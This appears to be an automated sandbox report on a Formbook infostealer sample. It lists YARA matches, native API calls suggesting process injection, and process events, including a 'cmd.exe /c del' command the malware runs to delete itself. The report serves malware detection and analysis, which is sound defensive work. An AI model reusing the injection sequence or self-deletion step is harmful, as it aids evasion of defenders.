          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284E6A02_2_0284E6A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284E6902_2_0284E690
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284E69B2_2_0284E69B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_0284CC5C2_2_0284CC5C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 2_2_006120502_2_00612050
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0040102D5_2_0040102D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B8D35_2_0041B8D3
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B8D65_2_0041B8D6
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041C98B5_2_0041C98B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041C3435_2_0041C343
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00408C8B5_2_00408C8B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00408C905_2_00408C90
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00402D8C5_2_00402D8C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01072D075_2_01072D07
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01071D555_2_01071D55
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A05_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB0905_2_00FBB090
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010725DD5_2_010725DD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB841F5_2_00FB841F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010610025_2_01061002
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E05_2_00FBD5E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD25815_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010720A85_2_010720A8
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA0D205_2_00FA0D20
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC41205_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAF9005_2_00FAF900
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01072B285_2_01072B28
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC6E305_2_00FC6E30
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106DBD25_2_0106DBD2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01071FF15_2_01071FF1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDEBB05_2_00FDEBB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010722AE5_2_010722AE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01072EF75_2_01072EF7
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_005420505_2_00542050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD46610_2_047FD466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048020A810_2_048020A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474841F10_2_0474841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048028EC10_2_048028EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F100210_2_047F1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A010_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474B09010_2_0474B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04730D2010_2_04730D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475412010_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048025DD10_2_048025DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473F90010_2_0473F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04802D0710_2_04802D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474D5E010_2_0474D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04801D5510_2_04801D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476258110_2_04762581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048022AE10_2_048022AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04756E3010_2_04756E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04802EF710_2_04802EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04801FF110_2_04801FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04802B2810_2_04802B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FDBD210_2_047FDBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476EBB010_2_0476EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B8D610_2_0016B8D6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B8D310_2_0016B8D3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016C98B10_2_0016C98B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016C34310_2_0016C343
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00158C9010_2_00158C90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00158C8B10_2_00158C8B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152D9010_2_00152D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152D8C10_2_00152D8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152FB010_2_00152FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0473B150 appears 35 times
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: String function: 00FAB150 appears 35 times
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004185EB NtCreateFile,5_2_004185EB
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,5_2_004187CA
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE98F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00FE98F0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_00FE9860
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9840 NtDelayExecution,LdrInitializeThunk,5_2_00FE9840
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE95D0 NtClose,LdrInitializeThunk,5_2_00FE95D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE99A0 NtCreateSection,LdrInitializeThunk,5_2_00FE99A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9540 NtReadFile,LdrInitializeThunk,5_2_00FE9540
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00FE9910
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00FE96E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00FE9660
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A50 NtCreateFile,LdrInitializeThunk,5_2_00FE9A50
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A20 NtResumeThread,LdrInitializeThunk,5_2_00FE9A20
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00FE9A00
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9FE0 NtCreateMutant,LdrInitializeThunk,5_2_00FE9FE0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE97A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00FE97A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9780 NtMapViewOfSection,LdrInitializeThunk,5_2_00FE9780
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9710 NtQueryInformationToken,LdrInitializeThunk,5_2_00FE9710
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE98A0 NtWriteVirtualMemory,5_2_00FE98A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEB040 NtSuspendThread,5_2_00FEB040
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9820 NtEnumerateKey,5_2_00FE9820
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE95F0 NtQueryInformationFile,5_2_00FE95F0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE99D0 NtCreateProcessEx,5_2_00FE99D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9560 NtWriteFile,5_2_00FE9560
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9950 NtQueueApcThread,5_2_00FE9950
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEAD30 NtSetContextThread,5_2_00FEAD30
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9520 NtWaitForSingleObject,5_2_00FE9520
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE96D0 NtCreateKey,5_2_00FE96D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A80 NtOpenDirectoryObject,5_2_00FE9A80
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9670 NtQueryInformationProcess,5_2_00FE9670
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9650 NtQueryValueKey,5_2_00FE9650
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9610 NtEnumerateValueKey,5_2_00FE9610
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A10 NtQuerySection,5_2_00FE9A10
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA3B0 NtGetContextThread,5_2_00FEA3B0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9770 NtSetInformationFile,5_2_00FE9770
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA770 NtOpenThread,5_2_00FEA770
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9760 NtOpenProcess,5_2_00FE9760
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9730 NtQueryVirtualMemory,5_2_00FE9730
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA710 NtOpenProcessToken,5_2_00FEA710
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9B00 NtSetValueKey,5_2_00FE9B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04779860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779840 NtDelayExecution,LdrInitializeThunk,10_2_04779840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779540 NtReadFile,LdrInitializeThunk,10_2_04779540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04779910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047795D0 NtClose,LdrInitializeThunk,10_2_047795D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047799A0 NtCreateSection,LdrInitializeThunk,10_2_047799A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04779660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A50 NtCreateFile,LdrInitializeThunk,10_2_04779A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779650 NtQueryValueKey,LdrInitializeThunk,10_2_04779650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_047796E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047796D0 NtCreateKey,LdrInitializeThunk,10_2_047796D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779710 NtQueryInformationToken,LdrInitializeThunk,10_2_04779710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779FE0 NtCreateMutant,LdrInitializeThunk,10_2_04779FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779780 NtMapViewOfSection,LdrInitializeThunk,10_2_04779780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477B040 NtSuspendThread,10_2_0477B040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779820 NtEnumerateKey,10_2_04779820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047798F0 NtReadVirtualMemory,10_2_047798F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047798A0 NtWriteVirtualMemory,10_2_047798A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779560 NtWriteFile,10_2_04779560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779950 NtQueueApcThread,10_2_04779950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477AD30 NtSetContextThread,10_2_0477AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779520 NtWaitForSingleObject,10_2_04779520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047795F0 NtQueryInformationFile,10_2_047795F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047799D0 NtCreateProcessEx,10_2_047799D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779670 NtQueryInformationProcess,10_2_04779670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A20 NtResumeThread,10_2_04779A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779610 NtEnumerateValueKey,10_2_04779610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A10 NtQuerySection,10_2_04779A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A00 NtProtectVirtualMemory,10_2_04779A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A80 NtOpenDirectoryObject,10_2_04779A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779770 NtSetInformationFile,10_2_04779770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A770 NtOpenThread,10_2_0477A770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779760 NtOpenProcess,10_2_04779760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779730 NtQueryVirtualMemory,10_2_04779730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A710 NtOpenProcessToken,10_2_0477A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779B00 NtSetValueKey,10_2_04779B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A3B0 NtGetContextThread,10_2_0477A3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047797A0 NtUnmapViewOfSection,10_2_047797A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001685F0 NtCreateFile,10_2_001685F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001686A0 NtReadFile,10_2_001686A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00168720 NtClose,10_2_00168720
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001687D0 NtAllocateVirtualMemory,10_2_001687D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001685EB NtCreateFile,10_2_001685EB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016871A NtClose,10_2_0016871A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001687CA NtAllocateVirtualMemory,10_2_001687CA
          Source: CtTYTpaAKA.exe, 00000002.00000000.286061314.0000000000690000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.354095072.00000000005C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.354643605.000000000109F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exeBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exeVirustotal: Detection: 13%
          Source: CtTYTpaAKA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CtTYTpaAKA.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: CtTYTpaAKA.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: CtTYTpaAKA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: CtTYTpaAKA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: CtTYTpaAKA.exe, cscript.exe
